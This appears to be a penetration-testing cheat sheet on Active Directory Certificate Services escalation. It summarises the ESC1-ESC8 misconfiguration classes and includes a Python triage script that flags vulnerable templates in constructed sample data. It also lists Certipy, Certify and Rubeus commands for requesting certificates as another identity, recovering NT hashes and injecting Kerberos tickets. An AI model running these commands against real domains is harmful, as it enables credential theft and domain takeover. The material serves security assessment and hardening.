Overview

Active Directory Certificate Services (ADCS) is Microsoft's PKI implementation for issuing and managing certificates in a domain. Misconfigured certificate templates, CA settings and ACLs let a low-privileged principal obtain a certificate for another identity (or control the CA itself) and escalate to domain admin. The reference research is "Certified Pre-Owned" by SpecterOps (Will Schroeder and Lee Christensen), which defined the ESC1-ESC8 classes below.

Tools

Certify (Windows)

.\Certify.exe find /vulnerable
.\Certify.exe cas                    # List CAs
.\Certify.exe find                   # List templates

Certipy (Linux)

certipy find -u user@domain.local -p 'password' -dc-ip DC_IP -vulnerable   # Only print vulnerable templates/CAs
certipy find -u user@domain.local -p 'password' -dc-ip DC_IP -stdout       # Print everything instead of writing the output files

Vulnerability Summary

ESC    Name                             Description
ESC1   Misconfigured template           Enrollee supplies subject (SAN), client-auth EKU, no manager approval, low-priv enrollment rights
ESC2   Misconfigured template           Any Purpose EKU or no EKU at all, low-priv enrollment rights
ESC3   Enrollment agent                 Certificate Request Agent EKU; enroll on behalf of other users
ESC4   Template ACL misconfiguration    Write access to a template object; modify it into an ESC1 template
ESC5   PKI object ACL                   Write access to CA-related objects (CA server, CA object in the Configuration NC, NTAuthCertificates)
ESC6   EDITF_ATTRIBUTESUBJECTALTNAME2   CA flag allows a SAN in any request; mitigated on CAs patched with the May 2022 updates (KB5014754), which add the requester's SID to issued certificates
ESC7   CA ACL                           ManageCA and/or ManageCertificates rights on the CA (enable the SAN flag, approve pending requests)
ESC8   NTLM relay to HTTP enrollment    Relay NTLM authentication to the web enrollment endpoint and enroll as the relayed account
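The template and CA conditions in the table map directly onto fields that Certipy's find command already reports. The following Python is an added example, not Certipy's or Certify's own code: it encodes the ESC1-ESC4 template checks and the ESC6-ESC8 CA checks as functions and runs them over a constructed find-style record set. The field names follow Certipy's JSON output as an assumption (normalised here, so verify them against your own output); the CORP.LOCAL domain, the template names and the CA name are fictitious.

```python
"""Triage ADCS enumeration output against the ESC conditions in the table above.

Added example (not Certipy's or Certify's own code). Record field names follow
Certipy's `find` JSON output as an assumption; all sample data is constructed
and the CORP.LOCAL domain is fictitious.
"""

# Principals that mean "any low-privileged domain account" (domain prefix stripped).
LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone", "Users"}

# EKUs that let the certificate be used for Kerberos PKINIT / Schannel logon.
CLIENT_AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                    "Smart Card Logon", "Any Purpose"}


def _short(principal):
    """'CORP.LOCAL\\Domain Users' -> 'Domain Users'."""
    return principal.split("\\")[-1]


def _any_low_priv(principals):
    return any(_short(p) in LOW_PRIV for p in principals)


def template_escs(tpl):
    """Return the set of ESC1-ESC4 conditions a template record satisfies."""
    found = set()
    if not tpl.get("Enabled", False):
        return found                      # disabled templates cannot be enrolled from
    perms = tpl["Permissions"]
    enroll_rights = perms["Enrollment Permissions"]["Enrollment Rights"]
    ekus = set(tpl.get("Extended Key Usage", []))
    # Low-priv enrollment: broad enroll rights, no manager approval, no RA signatures.
    low_enroll = (_any_low_priv(enroll_rights)
                  and not tpl.get("Requires Manager Approval", False)
                  and tpl.get("Authorized Signatures Required", 0) == 0)
    client_auth = not ekus or bool(ekus & CLIENT_AUTH_EKUS)   # no EKU = usable for anything
    if low_enroll and tpl.get("Enrollee Supplies Subject", False) and client_auth:
        found.add("ESC1")
    if low_enroll and (not ekus or "Any Purpose" in ekus):
        found.add("ESC2")
    if low_enroll and "Certificate Request Agent" in ekus:
        found.add("ESC3")
    oc = perms["Object Control Permissions"]
    writers = (oc.get("Write Owner Principals", [])
               + oc.get("Write Dacl Principals", [])
               + oc.get("Write Property Principals", []))
    if _any_low_priv(writers) or _short(oc.get("Owner", "")) in LOW_PRIV:
        found.add("ESC4")                 # low-priv can rewrite the template into an ESC1 one
    return found


def ca_escs(ca):
    """Return the set of ESC6-ESC8 conditions a CA record satisfies."""
    found = set()
    if ca.get("User Specified SAN") == "Enabled":
        found.add("ESC6")                 # EDITF_ATTRIBUTESUBJECTALTNAME2 set on the CA
    rights = ca.get("Permissions", {}).get("Access Rights", {})
    if _any_low_priv(rights.get("ManageCa", [])) or _any_low_priv(rights.get("ManageCertificates", [])):
        found.add("ESC7")
    if ca.get("Web Enrollment") == "Enabled":
        found.add("ESC8")                 # HTTP enrollment endpoint available as an NTLM relay target
    return found


def triage(find_output):
    """Map each vulnerable template/CA name to its sorted ESC list."""
    report = {}
    for tpl in find_output.get("Certificate Templates", {}).values():
        escs = template_escs(tpl)
        if escs:
            report[tpl["Template Name"]] = sorted(escs)
    for ca in find_output.get("Certificate Authorities", {}).values():
        escs = ca_escs(ca)
        if escs:
            report[ca["CA Name"]] = sorted(escs)
    return report


def _tpl(name, enroll, ekus, supplies_subject=False, writers=("CORP.LOCAL\\Domain Admins",)):
    """Constructed template record in the (assumed) Certipy field layout."""
    return {
        "Template Name": name, "Enabled": True,
        "Enrollee Supplies Subject": supplies_subject,
        "Extended Key Usage": list(ekus),
        "Requires Manager Approval": False, "Authorized Signatures Required": 0,
        "Permissions": {
            "Enrollment Permissions": {"Enrollment Rights": list(enroll)},
            "Object Control Permissions": {
                "Owner": "CORP.LOCAL\\Enterprise Admins",
                "Write Owner Principals": list(writers),
                "Write Dacl Principals": list(writers),
                "Write Property Principals": list(writers),
            },
        },
    }


# Constructed sample: one ESC1 template, one safe template, one ESC4 template,
# one SubCA-like template with no EKU (ESC1 + ESC2), and a CA with SAN flag + web enrollment.
SAMPLE_FIND_OUTPUT = {
    "Certificate Templates": {
        "0": _tpl("VulnUser", ["CORP.LOCAL\\Domain Users"], ["Client Authentication"], supplies_subject=True),
        "1": _tpl("User", ["CORP.LOCAL\\Domain Users"], ["Client Authentication"]),
        "2": _tpl("LegacyWebServer", ["CORP.LOCAL\\Domain Admins"], ["Server Authentication"],
                  supplies_subject=True, writers=["CORP.LOCAL\\Domain Users"]),
        "3": _tpl("OpenSubCA", ["CORP.LOCAL\\Domain Users"], [], supplies_subject=True),
    },
    "Certificate Authorities": {
        "0": {"CA Name": "CORP-CA", "Web Enrollment": "Enabled", "User Specified SAN": "Enabled",
              "Permissions": {"Access Rights": {"ManageCa": ["CORP.LOCAL\\Administrators"],
                                                "ManageCertificates": ["CORP.LOCAL\\Administrators"],
                                                "Enroll": ["CORP.LOCAL\\Authenticated Users"]}}},
    },
}

if __name__ == "__main__":
    for name, escs in triage(SAMPLE_FIND_OUTPUT).items():
        print(f"{name}: {', '.join(escs)}")
```

Feed it the "Certificate Templates" and "Certificate Authorities" sections of a real find JSON file (after checking the field names match your Certipy version) to get a second opinion on which templates deserve a manual look; it deliberately does not flag ESC5, which depends on ACLs of objects outside the template and CA records.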

General Exploitation Flow

1. Find a vulnerable template or CA (certipy find -vulnerable / Certify.exe find /vulnerable)
2. Request a certificate, supplying the target identity where the ESC allows it (certipy req / Certify.exe request with an alternate name)
3. Authenticate with the certificate via Kerberos PKINIT (certipy auth / Rubeus asktgt)
4. Use the TGT, or the NT hash recovered from it, to access resources as the target

Authenticate with Certificate

Certipy

certipy auth -pfx admin.pfx -dc-ip DC_IP
Performs PKINIT with the certificate, saves the TGT as a .ccache file, and then uses a User-to-User (U2U) ticket request to recover the account's NT hash. If the certificate carries no usable identity, pass -username and -domain explicitly.

Rubeus

.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:pfxpass /ptt   # /ptt injects the TGT into the current logon session

Quick Reference

Task               Command
Find vulns         certipy find -u user -p pass -dc-ip DC -vulnerable
Certify            .\Certify.exe find /vulnerable
Auth with cert     certipy auth -pfx admin.pfx -dc-ip DC
List CAs           certipy find -u user -p pass -dc-ip DC